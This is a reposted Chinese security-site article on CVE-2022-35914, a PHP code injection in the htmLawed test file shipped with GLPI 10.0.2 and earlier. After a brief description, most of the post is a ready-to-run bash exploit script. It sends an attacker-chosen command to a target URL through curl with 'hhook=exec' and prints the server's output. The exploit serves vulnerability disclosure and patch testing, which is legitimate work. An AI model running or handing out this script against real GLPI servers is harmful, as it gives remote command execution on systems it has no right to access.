CVE-2022-35914 | 远程命令执行

admin 2024年8月5日22:44:33评论20 views字数 1348阅读4分29秒阅读模式

使使使

影响描述

        GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。GLPI10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed模块中的/vendor/htmlawed/htmlawed/htmLawedTest.php允许PHP代码注入。

poc&exp

# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE)# Exploit Author: Miguel Redondo (aka d4t4s3c)# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed# Software Link: https://github.com/kesar/HTMLawed# Version: <= 1.2.5# Tested on: Linux# CVE: CVE-2022-35914banner(){  echo "  ______     _______     ____   ___ ____  ____      _________  ___  _ _  _"  echo " / ___    / / ____|   |___  / _ ___ |___     |___ / ___|/ _ / | || |"  echo "| |      / /|  _| _____ __) | | | |__) | __) |____ |_ ___  (_) | | || |_"  echo "| |___   V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) __, | |__   _|"  echo " ____|  _/  |_____|   |_____|___/_____|_____|   |____/____/  /_/|_|  |_|"}while getopts ":u:c:" arg; do  case $arg in    u) URL=$OPTARG; let parameter_counter+=1 ;;    c) CMD=$OPTARG; let parameter_counter+=1 ;;  esacdoneif [ -z "$URL" ] || [ -z "$CMD" ]; then  banner  echo -e "n[i] Usage: ${0} -u <URL> -c <CMD>n"  exitelse  banner  echo -e "n[+] Command output:"ficurl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '&nbps; [[0-9]+] =>'| sed -E 's/&nbps; [[0-9]+] => (.*)<br />/1/'

CVE-2022-35914 | 远程命令执行

CVE-2022-35914 | 远程命令执行

原文始发于微信公众号(漏洞猎人):CVE-2022-35914 | 远程命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月5日22:44:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-35914 | 远程命令执行http://cn-sec.com/archives/2764977.html

发表评论

匿名网友 填写信息